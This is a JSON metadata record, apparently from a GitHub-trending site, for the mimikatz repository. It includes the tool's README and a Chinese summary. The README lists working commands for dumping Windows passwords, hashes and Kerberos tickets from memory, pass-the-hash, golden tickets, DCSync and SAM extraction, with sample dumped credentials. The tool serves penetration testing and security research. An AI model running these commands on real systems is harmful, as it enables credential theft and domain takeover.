[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-6042":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":16,"subscribersCount":16,"size":16,"stars1d":17,"stars7d":18,"stars30d":19,"stars90d":16,"forks30d":16,"starsTrendScore":18,"compositeScore":20,"rankGlobal":10,"rankLanguage":10,"license":10,"archived":21,"fork":21,"defaultBranch":22,"hasWiki":23,"hasPages":21,"topics":24,"createdAt":10,"pushedAt":10,"updatedAt":25,"readmeContent":26,"aiSummary":27,"trendingCount":16,"starSnapshotCount":16,"syncStatus":28,"lastSyncTime":29,"discoverSource":30},6042,"mimikatz","gentilkiwi\u002Fmimikatz","gentilkiwi","A little tool to play with Windows security","http:\u002F\u002Fblog.gentilkiwi.com\u002Fmimikatz",null,"C",21614,4128,890,154,0,5,19,81,94.6,false,"master",true,[],"2026-06-12 04:00:27","# mimikatz\n\n**`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security.\n\nIt's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.\n\n```\n  .#####.   mimikatz 2.0 alpha (x86) release \"Kiwi en C\" (Apr  6 2014 22:02:03)\n .## ^ ##.\n ## \u002F \\ ##  \u002F* * *\n ## \\ \u002F ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n '## v ##'   https:\u002F\u002Fblog.gentilkiwi.com\u002Fmimikatz             (oe.eo)\n  '#####'                                    with  13 modules * * *\u002F\n\n\nmimikatz # privilege::debug\nPrivilege '20' OK\n \nmimikatz # sekurlsa::logonpasswords\n \nAuthentication Id : 0 ; 515764 (00000000:0007deb4)\nSession           : Interactive from 2\nUser Name         : Gentil Kiwi\nDomain            : vm-w7-ult-x\nSID               : S-1-5-21-1982681256-1210654043-1600862990-1000\n        msv :\n         [00000003] Primary\n         * Username : Gentil Kiwi\n         * Domain   : vm-w7-ult-x\n         * LM       : d0e9aee149655a6075e4540af1f22d3b\n         * NTLM     : cc36cf7a8514893efccd332446158b1a\n         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30\n        tspkg :\n         * Username : Gentil Kiwi\n         * Domain   : vm-w7-ult-x\n         * Password : waza1234\u002F\n...\n```\nBut that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations in the GitHub Wiki https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fwiki or on https:\u002F\u002Fblog.gentilkiwi.com (in French, _yes_).\n\nIf you don't want to build it, binaries are availables on https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Freleases\n\n\n## Quick usage\n```\nlog\nprivilege::debug\n```\n\n### sekurlsa\n```\nsekurlsa::logonpasswords\nsekurlsa::tickets \u002Fexport\n\nsekurlsa::pth \u002Fuser:Administrateur \u002Fdomain:winxp \u002Fntlm:f193d757b4d487ab7e5a3743f038f713 \u002Frun:cmd\n```\n\n### kerberos\n```\nkerberos::list \u002Fexport\nkerberos::ptt c:\\chocolate.kirbi\n\nkerberos::golden \u002Fadmin:administrateur \u002Fdomain:chocolate.local \u002Fsid:S-1-5-21-130452501-2365100805-3685010670 \u002Fkrbtgt:310b643c5316c8c3c70a10cfb17e2e31 \u002Fticket:chocolate.kirbi\n```\n\n### crypto\n```\ncrypto::capi\ncrypto::cng\n\ncrypto::certificates \u002Fexport\ncrypto::certificates \u002Fexport \u002Fsystemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE\n\ncrypto::keys \u002Fexport\ncrypto::keys \u002Fmachine \u002Fexport\n```\n\n### vault & lsadump\n```\nvault::cred\nvault::list\n\ntoken::elevate\nvault::cred\nvault::list\nlsadump::sam\nlsadump::secrets\nlsadump::cache\ntoken::revert\n\nlsadump::dcsync \u002Fuser:domain\\krbtgt \u002Fdomain:lab.local\n```\n\n## Build\n`mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:\n* for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http:\u002F\u002Fwww.microsoft.com\u002Fdownload\u002Fdetails.aspx?id=44914)\n* _for `mimikatz driver`, `mimilove` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http:\u002F\u002Fwww.microsoft.com\u002Fdownload\u002Fdetails.aspx?id=11800_\n\n`mimikatz` uses `SVN` for source control, but is now available with `GIT` too!\nYou can use any tools you want to sync, even incorporated `GIT` in Visual Studio 2013 =)\n\n### Synchronize!\n* GIT URL is  : https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz.git\n* SVN URL is  : https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Ftrunk\n* ZIP file is : https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Farchive\u002Fmaster.zip\n\n### Build the solution\n* After opening the solution, `Build` \u002F `Build Solution` (you can change architecture)\n* `mimikatz` is now built and ready to be used! (`Win32` \u002F `x64` even `ARM64` if you're lucky)\n  * you can have error `MSB3073` about `_build_.cmd` and `mimidrv`, it's because the driver cannot be build without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK.\n\n### ddk2003\nWith this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies)\n\nFor this optional platform, Windows Driver Kit **7.1** (WinDDK) - http:\u002F\u002Fwww.microsoft.com\u002Fdownload\u002Fdetails.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.\n\nFollow instructions:\n* https:\u002F\u002Fblog.gentilkiwi.com\u002Fprogrammation\u002Fexecutables-runtime-defaut-systeme\n* _https:\u002F\u002Fblog.gentilkiwi.com\u002Fcryptographie\u002Fapi-systemfunction-windows#winheader_\n\n## Continuous Integration\n`mimikatz` project is available on AppVeyor - https:\u002F\u002Fci.appveyor.com\u002Fproject\u002Fgentilkiwi\u002Fmimikatz\n\nIts status is: ![AppVeyor CI status](https:\u002F\u002Fci.appveyor.com\u002Fapi\u002Fprojects\u002Fstatus\u002Fgithub\u002Fgentilkiwi\u002Fmimikatz?svg=true&retina=true)\n\n## Licence\nCC BY 4.0 licence - https:\u002F\u002Fcreativecommons.org\u002Flicenses\u002Fby\u002F4.0\u002F\n\n`mimikatz` needs coffee to be developed:\n* PayPal: https:\u002F\u002Fwww.paypal.me\u002Fdelpy\u002F\n\n## Author\n* Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )\n* DCSync and DCShadow functions in `lsadump` module were co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http:\u002F\u002Fwww.mysmartlogon.com )\n\nThis is a **personal** development, please respect its philosophy and don't use it for bad things!","mimikatz 是一个用于探索和操作 Windows 安全性的工具。它能够从内存中提取明文密码、哈希值、PIN 码以及 Kerberos 票据，并支持执行 pass-the-hash、pass-the-ticket 以及生成 Golden Ticket 等高级功能。此外，mimikatz 还提供了丰富的模块来处理加密、终端服务、事件日志等安全相关信息。该工具特别适用于渗透测试、安全审计及研究场景下对 Windows 系统进行深入的安全分析与漏洞利用实验。",2,"2026-06-11 03:05:28","top_language"]